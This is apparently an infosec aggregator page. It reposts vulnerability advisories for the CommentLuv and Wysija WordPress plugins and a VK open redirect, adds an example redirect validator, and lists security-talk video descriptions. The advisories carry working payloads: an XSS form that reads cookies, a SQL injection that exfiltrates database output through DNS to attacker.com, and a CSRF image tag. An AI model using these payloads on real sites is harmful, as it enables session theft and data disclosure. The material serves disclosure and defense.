The PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display the administrator's cookies:

<form action="http://[host]/wp-admin/admin-ajax.php" method="post" name="askform">
<input type="hidden" name="action" value="cl_ajax" />
<input type="hidden" name="do" value="fetch" />
<input type="hidden" name="url" value="1" />
<input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/>
<input type="submit" id="btn">
</form>

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to CommentLuv 2.92.4

More Information:
http://wordpress.org/extend/plugins/commentluv/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23138 - https://www.htbridge.com/advisory/HTB23138 - Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin.
[2] CommentLuv - http://www.commentluv.com/ - CommentLuv is a popular WordPress plugin that will magnetize your readers, socialize your comments and viralize your posts.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: PacketStorm
-
WordPress Wysija Newsletters plugin version 2.2 suffers from cross site request forgery and remote SQL injection vulnerabilities.

Advisory ID: HTB23140
Product: Wysija Newsletters WordPress plugin
Vendor: Wysija
Vulnerable Version(s): 2.2 and probably prior
Tested Version: 2.2
Vendor Notification: January 16, 2013
Vendor Patch: January 18, 2013
Public Disclosure: February 6, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-1408
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the Wysija Newsletters WordPress plugin, which can be exploited to perform SQL Injection attacks.

1) SQL Injections in Wysija Newsletters WordPress plugin: CVE-2013-1408

The vulnerabilities exist due to insufficient filtration of user-supplied input passed via the "search" and "orderby" HTTP GET parameters to the "/wp-admin/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

The PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):

http://[host]/wp-admin/admin.php?page=wysija_campaigns&orderby=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --

This vulnerability could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to cross-site request forgery attacks. In order to do so an attacker should trick the logged-in administrator into visiting a web page with the CSRF exploit.

Basic CSRF exploit:

<img src="http://[host]/wp-admin/admin.php?page=wysija_campaigns&orderby=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Wysija Newsletters 2.2.1

More Information:
http://wordpress.org/extend/plugins/wysija-newsletters/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23140 - https://www.htbridge.com/advisory/HTB23140 - SQL Injection vulnerability in Wysija Newsletters WordPress plugin.
[2] Wysija Newsletters - http://www.wysija.com/ - A new and simple newsletter solution for WordPress.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: PacketStorm
-
The VK social network at vk.com suffers from an open redirection vulnerability.

+++++++++++
# Exploit Title: VK (social network) URL Redirector Abuse
# Vendor: www.vk.com
# Author: Juan Carlos García (NightSec)
# Blog: http://hackingmadrid.blogspot.com
# Facebook: http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196

*************************************************************************************
BRIEF DESCRIPTION
**************************************************************************************

VK (Originally VKontakte, Russian: ВКонтакте) is a European social network service popular among Russian-speaking users around the world. It is especially popular in Russia, Ukraine, Kazakhstan, Moldova, Belarus, and Israel. VK is a Facebook clone, with several common features, such as university exclusiveness of a network during its early stages, similar color, and similar features and functionality. VK is able to hold the position, the main countries, and successfully move ahead in Europe and America, despite efforts of the American network. Like other social networks, VK allows users to message contacts publicly or privately, create groups, public pages and events, share and tag images, audio and video, and play browser-based games.

*********************************
*********************************

URL Redirector Abuse PoC

http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com
http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Hackingmadrid
http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Ethical Hacking y ole by the face
http://vk.com/away.php?feature=share&post=193_594&to=http://www.hackingmadrid.blogspot.com
http://vk.com/away.php?to=http://hackingmadrid.blogspot.com
http://vk.com/away.php?to=http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196
http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org

Procedure: Open the link given above

**************************************************************************
Give special thanks to all the people who follow me on Ethical Hacking and Ole by the Face .. Thanks guys
*************************************************************************************

Source: PacketStorm
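The post above shows a redirector endpoint that forwards the browser to whatever the `to` parameter contains. The defensive counterpart is to validate that parameter before emitting a `Location` header. The following is an added example written for this page, not code from VK or from the post's author; the allowlisted hosts, the `pick_redirect_target` helper and the query strings fed to it are constructed for the demonstration. It goes slightly beyond the post by also handling the usual bypass shapes (scheme-relative `//host`, backslash-as-slash, userinfo `@` tricks, non-HTTP schemes, control characters).

```python
"""Validating a redirect target before forwarding the user (added example)."""
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist: the only external hosts this redirector may send users to.
TRUSTED_HOSTS = frozenset({"example.com", "www.example.com"})


def is_safe_redirect(target: str, trusted_hosts=TRUSTED_HOSTS) -> bool:
    """Return True only for a same-site absolute path ("/foo") or an http(s) URL
    whose host is in trusted_hosts. Everything else is rejected."""
    if not target:
        return False
    # Header-injection and parser-confusion guard: no control chars at all.
    if any(ord(c) < 0x20 or c == "\x7f" for c in target):
        return False
    # Browsers treat "\" like "/" in URLs, so "/\evil" would become "//evil".
    target = target.replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Purely relative: must be a single leading slash, never "//host".
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        # javascript:, data:, ftp: and friends are never valid redirect targets.
        return False
    host = parts.hostname  # already lowercased; userinfo and port stripped
    if host is None:
        return False
    return host in trusted_hosts


def pick_redirect_target(query_string: str, fallback: str = "/") -> str:
    """Extract `to` from a redirector query string and return it if it passes
    is_safe_redirect, otherwise a fixed same-site fallback page."""
    params = parse_qs(query_string, keep_blank_values=True)
    candidates = params.get("to", [])
    if len(candidates) != 1:
        # Missing or duplicated parameter: ambiguous, so refuse to redirect.
        return fallback
    target = candidates[0]
    return target if is_safe_redirect(target) else fallback


if __name__ == "__main__":
    # Constructed query strings in the shape of the away.php requests above.
    for qs in ("mt=8&to=http://evil.example/",
               "locale=ru_RU&to=https://www.example.com/page",
               "to=//evil.example/x",
               "to=/profile?id=5"):
        print(f"{qs!r:55} -> {pick_redirect_target(qs)}")
```

The allowlist compares the parsed hostname rather than doing a substring match, so `example.com.evil.example` and `example.com@evil.example` are both refused; a port on a trusted host is still accepted, which you may want to tighten for your own deployment.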
-
Description: At the moment, would you opt to use an Applet, Web Start app or even JavaFX for a new project? Team HackoGram has shown in this video how easy it is to exploit the latest JAVA. We recommend users uninstall JAVA for a few days; we will update you once a fully patched version is available.

View Full Post: Java Signed Applet Vulnerability – Oracle! | HackoGram | Tech with Beats

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Source: Java Signed Applet Vulnerability Exploit – Oracle
-
Description: In this video I will show you how to use the Pentbox tool. You can use this tool for various purposes like cracking hashes, network information gathering, web HTTP brute-force attacks etc. You can also use this tool as a fuzzer. PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems. Programmed in Ruby. http://www.pentbox.net/

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Source: Pentbox Tool Usage
-
Description: In this video I will show you how to use PowerShell scripts for post-exploitation, but I'm not actually using a script; I'm using commands as a script. You can use a ready-made script or create a script as per your requirements.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Source: Post-Exploitation Using PowerShell
-
Description: Commercial spyware is available for mobile devices, including iPhones, Android smartphones, BlackBerries, and Nokias. Many of the vendors claim that their software and its operation is undetectable on the smartphones after setup is complete. Is this true? Is there a way to identify whether or not some jerk installed spyware on your mobile phone, or are you destined to be PWN'd? This presentation examines the operation and trails left by five different commercial spyware products for mobile devices. Research for both Android and iPhone 4S will be given. A list of results from physical dumps, file system captures, and user files will be presented to show how stealthy the spyware really was. The results from the analysis of the install files will also be presented. From this information a list of indicators will be presented to determine whether or not spyware is on your phone.

Michael Robinson a/k/a Flash conducts forensic examinations of computers and mobile devices for a consulting firm in the Washington, DC area. In addition to his day job, he teaches graduate level courses in computer forensics and mobile device forensics at Stevenson University and George Mason University. Prior to his current consulting gig, Flash conducted computer forensic examinations in support of federal law enforcement. He worked for the Department of Defense for a bunch of years doing IT and forensics work. Flash has been in school forever. Eventually he'll get smart. He's building on his Master's in Computer Forensics with a Doctorate in the same field.

Chris Taylor is a security researcher and teacher who has been doing IT security, incident response, computer forensics, and mobile device forensics for the last 12 years. His experience comes from doing research, not reading research. Imagine that. He makes fun of his co-presenter constantly. He is also a staunch privacy advocate who hates writing bios.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Source: Spy Vs Spy: Spying On Mobile Device Spyware
-
Description: Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that give Maltego the ooomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego Local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter.

Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, Backtrack, and Maltego.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Source: Sploitego - Maltego's (Local) Partner In Crime
- 1 reply
-
- 1
-